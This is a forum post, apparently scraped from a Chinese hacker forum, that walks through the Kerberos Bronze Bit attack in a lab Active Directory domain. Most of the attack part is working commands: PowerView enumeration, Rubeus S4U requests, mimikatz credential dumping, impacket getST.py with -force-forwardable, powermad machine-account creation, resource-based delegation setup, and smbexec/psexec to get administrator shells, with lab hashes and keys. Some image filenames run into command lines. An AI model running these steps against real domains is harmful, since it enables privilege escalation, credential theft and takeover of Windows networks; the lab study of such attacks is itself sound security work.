• Welcome to the world's largest Chinese hacker forum

    Welcome to the world's largest Chinese hacker forum, our forum registration is open! You can now register for technical communication with us, this is a free and open to the world of the BBS, we founded the purpose for the study of network security, please don't release business of black/grey, or on the BBS posts, to seek help hacker if violations, we will permanently frozen your IP and account, thank you for your cooperation. Hacker attack and defense cracking or network Security

    business please click here: Creation Security  From CNHACKTEAM

绕过约束委/资源派限制 Kerberos Bronze Bit Attack


This Wind

Recommended Posts

概述

该漏洞解决了两个问题
1.禁止协议转换/协议过渡
2.受保护的用户和敏感用户不能被委派
具体设置表现为DC上设置Service1计算机账户为“仅使用Kerberos”而非“使用任何身份验证协议”

域环境

DC:WIN-5CHMN9C4UES.YAYI.local (Windows Server 2012)
域内两台机器:
one2008.YAYI.local (Windows Server 2008)
WIN-BMIO66D4K15.YAYI.local (Windows 7)

域用户:
fwwr
joke

传统的约束委派绕过

服务用户:

6W8P3R.png

委派对象:目标机器WIN-5CHMN9C4UES.YAYI.local

6W8VHO.png
6W8n4H.png

常规的约束委派利用:

1. 得到约束委派机器的用户凭证
2. 发现委派用户委派的目标机器
3. 获取RC4利用

powerview查看约束委派的机器:
Get-DomainComputer -TrustedToAuth -Properties distinguishedname,msds-allowedtodelegateto | fl
6W8f2R.png

Rubeus一条命令实现约束委派:

Rubeus.exe s4u /user:fwwr /domain:YAYI.local /rc4:ca69e7f0f02d9156d1616ba6abd395b6 /impersonateuser:administrator /msdsspn:"dhcp/WIN-5CHMN9C4UES.YAYI.local/YAYI.local" /altservice:cifs /ptt

由于用户设置了”敏感用户,不能被委派”,将造成失败

6W8jxI.png

使用新版impacket绕过:(截至最新版本:0.9.22),最低版本要求:(0.9.21)
先登录one2008机器用mimikatz获取AES和RC4

privilege::debug
sekurlsa::"ekeys"6WGCdS.png

获取TGT导入smbexec连接

python3 getST.py -spn cifs/WIN-5CHMN9C4UES.YAYI.local -impersonate administrator -hashes AAD3B435B51404EEAAD3B435B51404EE:0adce35e9d541588782a98fe1fce59cf -aesKey 56f41eb095b4099b27934963200180321742c6f89db55bff02495b22b17afe69 YAYI.local/one2008 -force-forwardable
export KRB5CCNAME=administrator.ccache
sudo python3 smbexec.py -no-pass -k WIN-5CHMN9C4UES.YAYI.local
6WGkGj.png
6WGZMq.png

基于资源的约束委派绕过

先配置环境,首先删除上一步service1的委派权限

6WGKdU.png

用adsi编辑器赋予域用户joke对 one2008写入权限

6WG3W9.png

joke用户可登录WIN-BMIO66D4K15,登录进去后
过powermad新加入一个计算机账户AttackerService,密码为AttackerServicePassword

Import-Module .\powermad.ps1
New-MachineAccount -MachineAccount AttackerService -Password $(ConvertTo-SecureString 'AttackerServicePassword' -AsPlainText -Force)6WGsSA.png

用mimikatz计算出hash

6WJ961.png

使用PowerShell Active Directory模块添加基于资源的约束委派,即从AttackerService到one2008的传入信任关系。

Import-Module .\Microsoft.ActiveDirectory.Management.dll
Get-ADComputer AttackerService #确认机器账户已经被添加
Set-ADComputer one2008 -PrincipalsAllowedToDelegateToAccount AttackerService$ #设置域用户到目标机器
Get-ADComputer one2008 -Properties PrincipalsAllowedToDelegateToAccount #查看机器验证用户是否成功委派到目标机器
Get-DomainUser -Identity <user> -Properties objectsid #获取某个用户的SID
Get-DomainObjectAcl -Identity one2008.YAYI.local  | ?{$_.SecurityIdentifier -match "S-1-5-21-2799505025-1944254007-2887416074-1618"} #查询某个机子的ACL
  • 1
  • 2
6WJmpd.png

可以看到现在对One2008.YAYI.local有完全的控制权限,直接申请TGT远程连接即可 (这里的RC4和AES key是上面的mimikatz获取的)

python3 getST.py -spn cifs/one2008.YAYI.local -impersonate administrator -hashes 830f8df592f48bc036ac79a2bb8036c5:830f8df592f48bc036ac79a2bb8036c5 -aesKey 537056f14b0f81bc6e4be6ddba7786efdadb813c61ed5a6dce1b YAYI.local/AttackerService -force-forwardable
export KRB5CCNAME=administrator.ccache
python3 psexec.py -no-pass -k one2008.YAYI.local6WJaXq.png

参考链接

https://y4er.com/post/kerberos-bronze-bit-attack/

https://422926799.github.io/posts/9cf32cdf.html

Link to comment
Share on other sites

Create an account or sign in to comment

You need to be a member in order to leave a comment

Create an account

Sign up for a new account in our community. It's easy!

Register a new account

Sign in

Already have an account? Sign in here.

Sign In Now